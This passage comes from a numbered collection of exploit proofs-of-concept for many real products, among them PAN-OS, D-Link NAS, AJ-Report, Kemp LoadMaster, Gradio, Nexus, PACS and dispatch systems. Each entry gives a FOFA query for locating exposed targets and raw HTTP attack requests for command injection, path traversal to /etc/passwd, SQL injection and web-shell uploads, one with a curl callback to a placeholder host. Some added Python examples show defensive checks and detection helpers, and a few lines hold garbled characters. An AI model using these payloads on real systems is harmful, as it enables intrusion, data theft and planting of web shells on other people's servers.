FOFA:body="/808gps/"
Default credentials: admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD (omitted for length; see the note at the top of the page)

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute, base64-encoded (aWQ= is id). user and passwd are constants in the PoC rather than credentials taken from the target; passwd is base64 as well (YWJjMTIzNDVjYmE decodes to abc12345cba).
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:10051
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}DNSLOG_HOST`;
Accept-Encoding: gzip

DNSLOG_HOST is a placeholder for a host you control. The SESSID value is used as a file path (the ../ traversal drops a file into the device telemetry directory) and the backtick section of that file name is later evaluated by a shell; ${IFS} substitutes for a space so the file name contains none. Confirmation is out-of-band (the DNS or HTTP callback); the HTTP response to this request is not the indicator.

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

url is base64 for rtsp://a (plus a trailing newline); transport decodes to || (echo '[S]'; id; echo '[E]')#; and is spliced unescaped into the shell command thumb.php runs for rtsp URLs, so the output of id appears between [S] and [E] in the response.

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

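Entries 126, 129 and 147, and the CVE-2024-27199 paths in entry 132, are the same mistake: the server decides a request is harmless (a static directory, a log file name, a public prefix) before it resolves the ../ segments. The Python below is an added example, not code from aiohttp, ColdFusion, RaidenMAILD or TeamCity. It resolves a requested name against a root the way a hardened file handler should, and shows why an unauthenticated-prefix allow-list has to be evaluated on the normalized path. The root directories and the PUBLIC_PREFIXES list are assumptions chosen for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# Prefixes a modelled web app serves without authentication (same idea as the
# TeamCity paths in entry 132). The list itself is an assumption for this example.
PUBLIC_PREFIXES = ("/res/", "/update/", "/.well-known/acme-challenge/")


def normalize_request_path(raw_path):
    """Percent-decode (twice, to catch %252e) and collapse '.', '..' and repeated slashes."""
    decoded = unquote(unquote(raw_path)).replace("\\", "/")
    decoded = re.sub(r"/+", "/", "/" + decoded)
    return posixpath.normpath(decoded)


def resolve_under_root(root, requested):
    """Absolute path of `requested` inside `root`, or None if it escapes root.

    Join first, normalize second, then check containment: this is the order a static
    handler (entry 126) or a log viewer (entry 129) must use before touching the disk.
    """
    root = posixpath.normpath(root)
    decoded = unquote(unquote(requested)).replace("\\", "/")
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root.rstrip("/") + "/"):
        return None
    return candidate


def naive_is_public(raw_path):
    """Allow-list on the raw path: lets '/res/../admin/diagnostic.jsp' through unauthenticated."""
    return raw_path.startswith(PUBLIC_PREFIXES)


def strict_is_public(raw_path):
    """Allow-list on the normalized path, i.e. on what the server will actually open."""
    return normalize_request_path(raw_path).startswith(PUBLIC_PREFIXES)


def traversal_attempt(raw_path):
    """Detection helper: True when the decoded path carries a '..' segment at all."""
    decoded = unquote(unquote(raw_path)).replace("\\", "/")
    return ".." in decoded.split("/")


if __name__ == "__main__":
    for name in ("css/../main.css", "../../../../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd"):
        print(f"{name!r:40} -> {resolve_under_root('/srv/static', name)}")
    for path in ("/res/app.css", "/res/../admin/diagnostic.jsp"):
        print(f"{path!r:40} naive={naive_is_public(path)} strict={strict_is_public(path)}")
```

The containment test compares against root plus a trailing slash so that a sibling directory such as /srv/static2 cannot pass as "inside" /srv/static; a real handler would additionally call os.path.realpath on the candidate to defeat symlinks inside the root.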
148. CrushFTP authentication bypass and server-side template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD (omitted for length; see the note at the top of the page)

149. AJ-Report open-source dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

validationRules is JavaScript that the server evaluates with access to Java classes, hence java.lang.ProcessBuilder; the ;swagger-ui/ suffix on the path is what lets the request through without a login (see entry 150). This variant runs the Windows command ipconfig.

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

Same endpoint and mechanism as entry 149 with the Linux command id; the function's return value (the command output) comes back in the response.

: I% i1 G8 h; s: j, Z151. AJ-Report 1.4.1 pageList sql注入
) i" x. {. T. O5 I2 WFOFA:title="AJ-Report"4 J# I5 ^$ W2 b0 [5 o2 E
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1, j! g- p6 c7 h0 F* M# F
Host: x.x.x.x% ^9 Q( H1 i' h. {8 c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* V7 l' c% o% ]* ?/ R( eConnection: close. ?' ^+ p. k& |7 c
Accept-Encoding: gzip
; Y, d9 ]" I, w6 V* B& e5 f9 s# I# U8 R) p
- _( @4 ~% J* O
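Entries 132 (CVE-2024-27198), 149, 150 and 151 share one shape of bug: an authentication filter classifies the request by its raw URI (a .jsp suffix, a swagger-ui segment), while the framework routes on a path from which ;-delimited matrix parameters have been stripped, so /app/rest/users;.jsp and /dataSetParam/verification;swagger-ui/ land on protected controllers without a session. The Python below is an added example that models those two views of a request; it is not TeamCity or AJ-Report code, and the PUBLIC_SUFFIXES and PUBLIC_MARKERS lists are assumptions. The same function serves as a log-review rule (flag requests where the two views disagree) and as the shape of the fix (take the allow-list decision on the dispatched path).

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# What the modelled authentication filter treats as "static, no login needed" (assumption).
PUBLIC_SUFFIXES = (".jsp", ".css", ".js", ".html")
PUBLIC_MARKERS = ("swagger-ui",)


def strip_matrix_params(path):
    """Remove ';token' / ';name=value' from every segment, as a servlet container does before routing."""
    return "/".join(segment.split(";", 1)[0] for segment in path.split("/"))


def query_param(query, wanted):
    """First value of `wanted` in a raw query string; split on '&' only, so ';' stays in the value."""
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name == wanted:
            return unquote(value)
    return None


def raw_view(uri):
    """The path the weak filter inspects: the 'jsp' forward target if present, else the URI path."""
    parts = urlsplit(uri)
    forward = query_param(parts.query, "jsp")
    return forward if forward is not None else parts.path


def dispatched_view(uri):
    """The path the framework actually routes to: matrix params gone, slashes collapsed, no trailing slash."""
    cleaned = re.sub(r"/+", "/", strip_matrix_params(raw_view(uri)))
    return posixpath.normpath(cleaned or "/")


def looks_public(path):
    return path.endswith(PUBLIC_SUFFIXES) or any(marker in path for marker in PUBLIC_MARKERS)


def weak_is_public(uri):
    """Allow-list decision on the raw view (the vulnerable pattern)."""
    return looks_public(raw_view(uri))


def hardened_is_public(uri):
    """Allow-list decision on the dispatched view, which is what the request really reaches."""
    return looks_public(dispatched_view(uri))


def path_confusion(uri):
    """True when the weak check would skip authentication but the request lands on a protected route."""
    return weak_is_public(uri) and not hardened_is_public(uri)


if __name__ == "__main__":
    for uri in ("/pwned?jsp=/app/rest/users;.jsp",
                "/dataSetParam/verification;swagger-ui/",
                "/;swagger-ui/dataSource/pageList?pageNumber=1&pageSize=10",
                "/swagger-ui/index.html"):
        print(f"{uri!r:60} dispatched={dispatched_view(uri)!r} confusion={path_confusion(uri)}")
```

In a real deployment the dispatched view should come from the framework itself (the servlet path after the container has removed path parameters) rather than from a re-implementation like this one; the model is enough to write the detection rule and to explain why the raw-URI check failed.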
152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected:
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter, i.e. a Basic-auth username of ';ls;' with a throwaway password; the username is passed to a shell unquoted, so ls runs.
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

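Entries 122, 144, 146 and 152 all wrap the injected value in base64: the sql parameter, the passwd and system parameters, the thumb.php url parameter, and the Basic-auth username. A rule that matches on the encoded request sees nothing. The following Python is an added example, not code from the page or from any of the affected vendors: it pulls every base64-looking query parameter and Basic credential out of a raw request, restores missing padding, decodes, and keeps only results that are printable text, so that a log review or WAF rule operates on what the server actually receives. The sample requests are constructed from the request lines in those entries with placeholder hosts.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed samples, reduced to the lines that matter (entries 122, 144, 146, 152).
SAMPLE_REQUESTS = [
    "GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1\r\n"
    "Host: x.x.x.x\r\n\r\n",
    "GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1\r\n"
    "Host: x.x.x.x\r\n\r\n",
    "GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1 HTTP/1.1\r\n"
    "Host: x.x.x.x\r\n\r\n",
    "GET /access/set?param=enableapi&value=1 HTTP/1.1\r\n"
    "Host: x.x.x.x\r\n"
    "Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=\r\n\r\n",
]

B64_SHAPE = re.compile(r"[A-Za-z0-9+/]+=*")


def try_b64(value):
    """Decode value as base64 text; None unless it is well-formed and yields printable UTF-8.

    Padding is restored first because some PoCs drop the trailing '=' (entry 144's passwd).
    Ordinary words ('enableapi', 'mydlinkBRionyg') fail validation or decode to binary junk
    and are rejected, so the false-positive rate on normal parameters stays low.
    """
    candidate = value.strip()
    if not candidate or not B64_SHAPE.fullmatch(candidate):
        return None
    padded = candidate + "=" * (-len(candidate) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def decode_request(request_text):
    """Map 'query:<name>' / 'header:authorization' to decoded plaintext for one raw HTTP request."""
    head = request_text.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    target = request_line.split(" ")[1]
    found = {}
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = try_b64(value)
        if decoded is not None:
            found["query:" + name] = decoded
    for line in header_lines:
        key, _, value = line.partition(":")
        value = value.strip()
        if key.strip().lower() == "authorization" and value.lower().startswith("basic "):
            decoded = try_b64(value[6:])
            if decoded is not None:
                found["header:authorization"] = decoded
    return found


def decode_all(requests):
    """Decode a batch of raw requests; one dict per request, in order."""
    return [decode_request(r) for r in requests]


if __name__ == "__main__":
    for request, decoded in zip(SAMPLE_REQUESTS, decode_all(SAMPLE_REQUESTS)):
        print(request.split("\r\n")[0])
        for where, text in decoded.items():
            print(f"  {where} -> {text!r}")
```

Feed the decoded strings to whatever SQL or shell-syntax rule you already run on plain parameters; the point of the helper is only to remove the encoding layer that the four PoCs rely on.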
153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config and take a component id from its components list (component_id below)
http://x.x.x.x/config

Step 2: make the server copy /etc/passwd into its temporary file cache
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the cached copy through the file= route (the hashed directory component under /tmp/gradio/ is specific to the cached file; the page truncates it)
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire-and-rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

Time-based blind against a PostgreSQL backend (PG_SLEEP): the gsdwid value inside the JSON query object is concatenated into the statement, and a response delayed by about 5 seconds is the indicator.

155. 六零导航页 (LyLme Spage) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The uploaded file is then served at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php: the server renames the file but keeps the client-supplied .php extension, and the image/png Content-Type is not checked against the body.

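Entries 120, 121, 124, 130, 133, 155 and 157 above fail in the same way: the server keeps the extension (or, in entry 124, the whole name) the client supplied, stores the file under a web-served directory, and either trusts or ignores the client's Content-Type. The Python below is an added example, not code from any of those products, of the server-side check that makes every one of those PoCs fail: a final-extension allow-list, a magic-byte check that never consults the client's Content-Type, and a server-generated name. The extension-to-magic table is an assumption covering common image types; extend it per application, never with executable types.

```python
import os
import secrets

# Extension -> bytes the body must start with. The client's Content-Type header is never consulted.
# Assumed allow-list for this example.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def vet_upload(client_filename, data):
    """Return (accepted, detail): the server-side name on success, else the rejection reason.

    The client filename is consulted only for its *final* extension and never becomes the
    stored name, so '2.php', 'shell.php.png', '../../x.png' and NUL tricks all reach the same
    decision path. The body is checked against the magic bytes expected for that extension.
    """
    base = os.path.basename(client_filename.replace("\\", "/"))
    if not base or "\x00" in base:
        return False, "bad filename"
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED:
        return False, f"extension {ext!r} not allowed"
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension"
    # Random server-side name: the uploader can neither predict nor choose the stored path.
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed inputs mirroring the PoC parts above.
    for name, body in (("1.php", b"<?php phpinfo();?>"),
                       ("test.php.png", b"<?php phpinfo();unlink(__FILE__);?>"),
                       ("kjldycpvjrm.jsp", b"nyhelxrutzwhrsvsrafb"),
                       ("logo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)):
        print(f"{name!r:20} -> {vet_upload(name, body)}")
```

Accepted files should be written to a directory outside the web root and served back through a download handler that sets its own Content-Type; with that in place, even a rename bug like the one in entry 155 cannot turn an upload into code execution.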
156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
Affected:
TBK DVR-4104
TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

mdc decodes to: echo; echo asrgkjh0 > /var/example.txt; ls -l /var; echo ----------------; cat /var/example.txt; which writes a marker file and reads it back, so the response shows both the /var listing and the marker. The only "session" is Cookie: uid=1, a value the client chooses.

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system (PACS) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 (Lean Value Management System) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
